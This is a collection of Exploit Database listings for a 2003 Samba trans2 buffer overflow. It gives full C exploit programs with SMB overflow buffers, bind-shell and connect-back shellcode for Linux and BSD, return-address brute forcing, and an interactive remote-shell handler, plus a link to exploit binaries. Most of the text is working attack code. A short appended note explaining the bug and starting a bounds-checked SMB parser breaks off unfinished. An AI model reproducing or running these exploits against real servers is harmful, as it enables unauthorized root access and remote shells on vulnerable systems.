unsigned char setup2[] =
"\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00"
"\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64"
"\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
unsigned char overflow[] =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x64\x00\x00\x00\x00\xd0\x07"
"\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x90";
unsigned char shellcode[] =
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
"\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89"
"\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89"
"\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52"
"\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
"\x80";
int main (int argc, char *[]);
void usage (char *);
void hate (unsigned long);
void exploit (void);
BOOLEAN connection(char *, int);
int owned (int);
char buffer[BUFFER];
char zero[808] = "";
char * target=NULL;
int port = PORT;
struct sockaddr_in temp;
struct hostent *h;
int fdsocket;
void
usage (char * prg)
{
fprintf (stderr, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
fprintf (stderr, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n");
fprintf (stderr, " Usage : %s [-t target] [-p port] [-h]\n\n", prg);
fprintf (stderr, " \t-t\ttarget to attack\n");
fprintf (stderr, " \t-p\tsamba port (default 139)\n");
fprintf (stderr, " \t-h\tdisplay this help\n\n");
exit(-333);
}
void
hate (unsigned long ret)
{
int i;
char *ptr=buffer;
bzero(buffer, BUFFER);
memcpy ((char *)ptr, overflow, 96);
ptr += 96;
memset ((char *)ptr, NOP, (772+36));
ptr += (772+36);
memcpy ((char *)ptr, shellcode, strlen (shellcode));
ptr += strlen (shellcode);
memset ((char *)ptr, NOP, (87+44));
ptr += (87+44);
for (i = 1127 ; i < 1159 ; i += 4)
*(long *) &buffer[i] = ret;
}
void
exploit (void)
{
BOOLEAN status;
char outside[333];
if(!(status = connection (target, port)))
fatal (" [~] Error in connection\n");
/* here we setup connection */
if (send (fdsocket, setup1, sizeof (setup1)-1, 0) < 0)
fatal (" [~] Error in setup (1) connection\n");
recv (fdsocket, outside, sizeof (outside)-1, 0);
if (send (fdsocket, setup2, sizeof (setup2)-1, 0) < 0)
fatal (" [~] Error in setup (2) connection\n");
recv (fdsocket, outside, sizeof (outside)-1, 0);
/* exploiting samba */
if (send (fdsocket, buffer, sizeof (buffer)-1, 0) < 0)
fatal (" [~] Error in exploiting samba\n");
if (send (fdsocket, zero, sizeof (zero)-1, 0) < 0)
fatal (" [~] Error in exploiting samba\n");
close (fdsocket);
if((status = connection (target, SHELL)))
{
owned (fdsocket);
close (fdsocket);
}
}
BOOLEAN
connection (char *host, int port)
{
BOOLEAN status = TRUE;
temp.sin_family = AF_INET;
temp.sin_port = htons (port);
h = gethostbyname (host);
if (h == 0)
status = FALSE;
else
{
bcopy (h->h_addr,&temp.sin_addr,h->h_length);
if ((fdsocket = socket (AF_INET,SOCK_STREAM,0)) < 0)
status = FALSE;
else
if ((connect (fdsocket, (struct sockaddr*) &temp, sizeof (temp))) < 0)
status = FALSE;
}
return status;
}
int
owned (int fdsocket)
{
fd_set cya;
char outside[1024], *cmd="uname -a;id;\n";
int x;
FD_ZERO (&cya);
FD_SET (fdsocket, &cya);
FD_SET (0, &cya);
send (fdsocket, cmd, strlen (cmd), 0);
for(;;)
{
FD_SET (fdsocket, &cya);
FD_SET (0, &cya);
if (select (FD_SETSIZE, &cya, NULL, NULL, NULL) < 0)
break;
if (FD_ISSET (fdsocket, &cya))
{
if ((x = recv (fdsocket, outside, sizeof (outside)-1, 0)) < 0)
fatal (" [-] cya\n");
if (write (1, outside, x) < 0)
break;
}
if (FD_ISSET (0, &cya))
{
if ((x = read (0, outside, sizeof (outside)-1)) < 0)
fatal ("[-] cya\n");
if (send (fdsocket, outside, x, 0) < 0)
break;
}
usleep(10);
}
fprintf (stderr, " [-] cya hax0r\n");
exit(0);
}
int
main (int argc, char * argv[])
{
int c;
unsigned long ret;
while((c=getopt (argc, argv, "ht:p:")) != EOF)
{
switch(c)
{
case 't': target = optarg; break;
case 'p': port = atoi (optarg); break;
case 'h': usage (argv[0]);
default : usage (argv[0]);
}
}
if (argc==1 || target == NULL)
usage (argv[0]);
fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n");
fprintf (stdout, " [-] connecting to %s:%d\n", target, port);
fprintf (stdout, " [-] starting bruteforce\n\n");
for (ret=START; ret>=STOP; ret-=OFFSET)
{
fprintf (stdout, " [-] testing 0x%x\n", ret);
hate (ret);
exploit ();
}
fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n");
return 0;
}
Exploit Database EDB-ID: 22470
Publication date: 2003-05-11 22:00 +00:00
Author: eDSee
EDB Verified: Yes
// source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
/*
* Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003.
* Uses the connect-back method and brute-force mode.
* I just created & modified some code, and ripped some too :P
* Created on May 12th, 2003
*
* Thanks to eDSee (netric.org); Sambal is a nice exploit, bro...
* References: trans2root.pl, 0x333hate.c, sambal.c
* This code is just for education purposes
*
* XNUXER RESEARCH LABORATORY
* Official Site: http://infosekuriti.com
* Contact Email: xnuxer@yahoo.com, xnuxer@hackermail.com
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char
linux_connect_back[] =
/* fork(), execve sh -c [client] [host to bounce to], term=xterm */
"\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
"\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
"\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
"\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"
/* connect back shellcode (port=0xb0ef) */
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
char
bsd_connect_back[] =
/* fork(), execve sh -c [client] [host to bounce to], term=xterm */
"\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
"\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
"\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
"\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
"\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"
/* connect back shellcode (port=0xb0ef) */
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
"\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
"\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
typedef struct {
unsigned char type;
unsigned char flags;
unsigned short length;
} NETBIOS_HEADER;
typedef struct {
unsigned char protocol[4];
unsigned char command;
unsigned short status;
unsigned char reserved;
unsigned char flags;
unsigned short flags2;
unsigned char pad[12];
unsigned short tid;
unsigned short pid;
unsigned short uid;
unsigned short mid;
} SMB_HEADER;
pid_t childs[50];
int LOOP = 1;
struct sockaddr_in serv_addr;
int sock_listen, client;
int exploit_pid;
int listen_pid;
int port_listen = 45295;
void
usage(char *prog)
{
int i;
fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n"
"Connect back method, Xnuxer-Labs, 2003.\n"
"Usage : %s <type> <victim> <your_ip>\n"
"Targets:\n"
" 0 = Linux\n"
" 1 = FreeBSD/NetBSD\n"
" 2 = OpenBSD 3.0 and prior\n"
" 3 = OpenBSD 3.2 - non-exec stack\n\n", prog);
exit(1);
}
int
Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
{
/* ripped from no1 */
int flags;
int select_status;
fd_set connect_read, connect_write;
struct timeval timeout;
socklen_t getsockopt_length = 0; /* getsockopt() expects a socklen_t *, not an int * */
int getsockopt_error = 0;
struct sockaddr_in server;
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
inet_pton(AF_INET, ip, &server.sin_addr);
server.sin_port = htons(port);
if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return -1;
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return -1;
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&connect_read);
FD_ZERO(&connect_write);
FD_SET(fd, &connect_read);
FD_SET(fd, &connect_write);
if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
if(errno != EINPROGRESS) {
close(fd);
return -1;
}
}
else {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
if(select_status == 0) {
close(fd);
return -1;
}
if(select_status == -1) {
close(fd);
return -1;
}
if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
getsockopt_length = sizeof(getsockopt_error);
if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
errno = ETIMEDOUT;
close(fd);
return -1;
}
if(getsockopt_error == 0) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
errno = getsockopt_error;
close(fd);
return (-1);
}
}
}
else {
close(fd);
return 1;
}
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
int
read_timer(int fd, unsigned int time_out)
{
/* ripped from no1 */
int flags;
int select_status;
fd_set fdread;
struct timeval timeout;
if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&fdread);
FD_SET(fd, &fdread);
select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);
if(select_status == 0) {
close(fd);
return (-1);
}
if(select_status == -1) {
close(fd);
return (-1);
}
if(FD_ISSET(fd, &fdread)) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
close(fd);
return 1;
}
}
int
write_timer(int fd, unsigned int time_out)
{
/* ripped from no1 */
int flags;
int select_status;
fd_set fdwrite;
struct timeval timeout;
if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&fdwrite);
FD_SET(fd, &fdwrite);
select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);
if(select_status == 0) {
close(fd);
return -1;
}
if(select_status == -1) {
close(fd);
return -1;
}
if(FD_ISSET(fd, &fdwrite)) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
close(fd);
return -1;
}
}
int
start_session(int sock)
{
char buffer[1000];
char response[4096];
char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
"\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x00;
netbiosheader->length = htons(0x2E);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x73; /* session setup */
smbheader->flags = 0x08; /* caseless pathnames */
smbheader->flags2 = 0x01; /* long filenames supported */
smbheader->pid = getpid() & 0xFFFF;
smbheader->uid = 100;
smbheader->mid = 0x01;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);
if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 50, 0) < 0) return -1;
memset(response, 0x00, sizeof(response));
if (read_timer(sock, 3) == 1)
if (read(sock, response, sizeof(response) - 1) < 0) return -1;
netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
//if (netbiosheader->type != 0x00) fprintf(stderr, "+ Received a non session message\n");
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
memset(buffer, 0x00, sizeof(buffer));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x00;
netbiosheader->length = htons(0x3C);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x70; /* start connection */
smbheader->pid = getpid() & 0xFFFF;
smbheader->tid = 0x00;
smbheader->uid = 100;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);
if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 64, 0) < 0) return -1;
memset(response, 0x00, sizeof(response));
if (read_timer(sock, 3) == 1)
if (read(sock, response, sizeof(response) - 1) < 0) return -1;
netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
if (netbiosheader->type != 0x00) return -1;
return 0;
}
int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{
char buffer[4000];
char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x90";
int i = 0;
unsigned long dummy = ret - 0x90;
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x04;
netbiosheader->length = htons(2096);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x32; /* SMBtrans2 */
smbheader->tid = 0x01;
smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
buffer[1096] = 0xEB;
buffer[1097] = 0x70;
for (i = 0; i < 4 * 24; i += 8) {
memcpy(buffer + 1099 + i, &dummy, 4);
memcpy(buffer + 1103 + i, &ret, 4);
}
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1800, shellcode, strlen(shellcode));
if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
return 0;
}
return -1;
}
int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
char buffer[4000];
char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x90";
int i = 0;
unsigned long dummy = ret - 0x30;
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x04;
netbiosheader->length = htons(2096);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x32; /* SMBtrans2 */
smbheader->tid = 0x01;
smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
for (i = 0; i < 4 * 24; i += 4)
memcpy(buffer + 1131 + i, &dummy, 4);
memcpy(buffer + 1127, &ret, 4);
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));
if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
return 0;
}
return -1;
}
void shell(int sock)
{
fd_set fd_read;
char buff[1024], *cmd="uname -a;id;\n";
int n;
send(sock, cmd, strlen(cmd), 0);
while(1) {
FD_ZERO(&fd_read); /* select() modifies the set, so rebuild it on every iteration */
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
void GoAway(int sig) /* signal handler: must take the signal number */
{
(void)sig;
exit(0);
}
void start_listen()
{
FILE *fstat;
int cpid;
LISTENER:
bzero(&serv_addr, sizeof(serv_addr));
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
serv_addr.sin_port=htons(port_listen);
sock_listen=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(bind(sock_listen,(struct sockaddr *)&serv_addr,sizeof(serv_addr)))
{
port_listen++;
goto LISTENER;
}
if(listen(sock_listen,1))
{
perror("listen");
exit(1);
}
fprintf(stdout, "[+] Listen on port: %d\n",port_listen);
cpid = fork();
if (cpid) {
client=accept(sock_listen,0,0);
LOOP = 0;
kill(exploit_pid, SIGUSR2); /* kill(pid, sig): the original had the arguments swapped */
if (client > 0) {
fprintf(stdout, "[+] Yeah, I have a root ....!\n"
"------------------------------\n");
fstat=fopen(".ROOT", "a"); //needed by mass.c
if (fstat) fclose(fstat);
shell(client);
}
exit(0);
}
}
int
main (int argc,char *argv[])
{
char *shellcode = NULL;
int typeos = -1;
int port = 139;
int sock = 0;
int i = 0;
int status = 0;
int m = 0;
int ip1 = 0;
int ip2 = 0;
int ip3 = 0;
int ip4 = 0;
int sta = 0;
int STEPS = 512;
int ENDLOOP = 64;
char *desc;
unsigned long MAX_CHILDS = 40;
unsigned long ret = 0x0;
unsigned short int a_port;
struct sockaddr_in addr1;
struct hostent *he;
struct stat st;
if (argc != 4) usage(argv[0]);
typeos = atoi(argv[1]);
if (typeos < 0 || typeos > 3) { /* reject negative values too, otherwise desc/shellcode stay unset */
fprintf(stdout, "Os type out of list!\n");
exit(1);
}
he = gethostbyname(argv[2]);
if (he == NULL) {
fprintf(stderr, "Unable to resolve\n");
return -1;
}
listen_pid = getpid();
start_listen();
exploit_pid = listen_pid + 1;
//fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid);
sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1;
linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2;
linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3;
linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4;
fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n",
ip1, ip2, ip3, ip4, port_listen);
a_port = htons(port_listen);
linux_connect_back[177]= (a_port) & 0xff;
linux_connect_back[178]= (a_port >> 8) & 0xff;
bsd_connect_back[168]= (a_port) & 0xff;
bsd_connect_back[169]= (a_port >> 8) & 0xff;
switch(typeos) {
case 0:
desc = "Linux";
ret = 0xc0000000;
shellcode = linux_connect_back;
break;
case 1:
desc = "FreeBSD/NetBSD";
ret = 0xbfc00000;
shellcode = bsd_connect_back;
break;
case 2:
desc = "OpenBSD 3.1 and prior";
ret = 0xdfc00000;
shellcode = bsd_connect_back;
break;
case 3:
desc = "OpenBSD 3.2 non-exec stack";
ret = 0x00170000;
shellcode = bsd_connect_back;
break;
}
fprintf(stdout, "[+] Target: %s\n", desc);
memset(&addr1, 0, sizeof(addr1)); /* addr1 was never zeroed before use */
memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
addr1.sin_family = AF_INET;
addr1.sin_port = htons(port);
fprintf(stdout, "[+] Connecting to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
fprintf(stdout, "[+] Please wait a few seconds...\n");
signal(SIGUSR2, GoAway);
for (i = 0; i < 50; i++) childs[i] = -1;
i = 0; m = 0;
while (LOOP) {
if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
fprintf(stderr, "[+] socket() error.\n");
exit(-1);
}
ret -= STEPS; i++;
if ((ret & 0xff) == 0x00 && typeos != 3) ret++;
m++;
//fflush(0);
//fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret, m);
usleep(150000);
switch (childs[i] = fork()) {
case 0:
if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
//fprintf(stderr, "[+] connect() error.\n");
close(sock);
exit(-1);
}
start_session(sock);
sleep(3);
if (typeos != 3) {
if (exploit_normal(sock, ret, shellcode) < 0) {
//fprintf(stderr, " -> Failed.\n");
close(sock);
exit(-1);
}
} else {
if (exploit_openbsd32(sock, ret, shellcode) < 0) {
//fprintf(stderr, " -> Failed.\n");
close(sock);
exit(-1);
}
}
sleep(5);
close(sock);
exit(0);
break;
case -1:
exit(-1);
break;
default:
if (i > MAX_CHILDS - 2) {
wait(&status);
i--;
}
break;
}
if (m == ENDLOOP) LOOP = 0;
}
if (stat(".ROOT", &st) != -1)
kill(listen_pid, SIGUSR2); /* kill(pid, sig): the original had the arguments swapped */
else {
fprintf(stdout, "[+] Dohh, exploit failed.\n");
close(client); close(sock_listen);
kill(listen_pid, SIGUSR2);
sleep(2);
exit(0);
}
}
Exploit Database EDB-ID: 22471
Publication date: 2003-04-06 22:00 +00:00
Author: noir
EDB Verified: Yes
source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22471.tar.gz
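The two advisory descriptions above (EDB-ID 22470 and 22471) both state the root cause: user-supplied data copied into a static buffer without a length check. The listings on this page reach the NetBIOS and SMB headers by casting structs onto a fixed buffer, which is exactly the pattern a server must avoid. Added here as a defender-side example, not code from any listing on this page or from Samba: a bounds-checked parser for the NetBIOS session header and SMB header (the standard 4-byte and 32-byte layouts, with tid/pid/uid/mid at offsets 24 to 30 of the SMB header) that never reads past the bytes actually received, plus a simple consistency rule a capture tool could apply: the declared NetBIOS length must match the frame, and an SMBtrans2 (command 0x32) request carrying more body than SUSPICIOUS_TRANS2_LEN bytes is flagged. The threshold value is an assumption chosen for illustration, not a Samba constant, and build_frame() only constructs sample frames for testing.

```c
/* Added example (not from the exploit listings above): bounds-checked
 * NetBIOS + SMB header parsing with a length-consistency check. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define NB_HDR_LEN            4      /* NetBIOS session service header */
#define SMB_HDR_LEN           32     /* SMB header, including the 4-byte magic */
#define SMB_COM_SESSION_SETUP 0x73
#define SMB_COM_TRANSACTION2  0x32
#define SUSPICIOUS_TRANS2_LEN 1024   /* assumed alert threshold, illustration only */

typedef struct {
    uint8_t  nb_type;     /* 0x00 = session message */
    uint32_t nb_length;   /* 17-bit length field from the NetBIOS header */
    uint8_t  command;
    uint8_t  flags;
    uint16_t flags2;
    uint16_t tid, pid, uid, mid;
    size_t   body_len;    /* bytes following the SMB header */
} smb_frame_t;

enum {
    FRAME_OK           =  0,
    FRAME_TOO_SHORT    = -1,  /* fewer bytes than the two headers need */
    FRAME_NOT_SESSION  = -2,  /* NetBIOS type is not a session message */
    FRAME_LEN_MISMATCH = -3,  /* declared NetBIOS length != bytes received */
    FRAME_BAD_MAGIC    = -4   /* missing "\xffSMB" signature */
};

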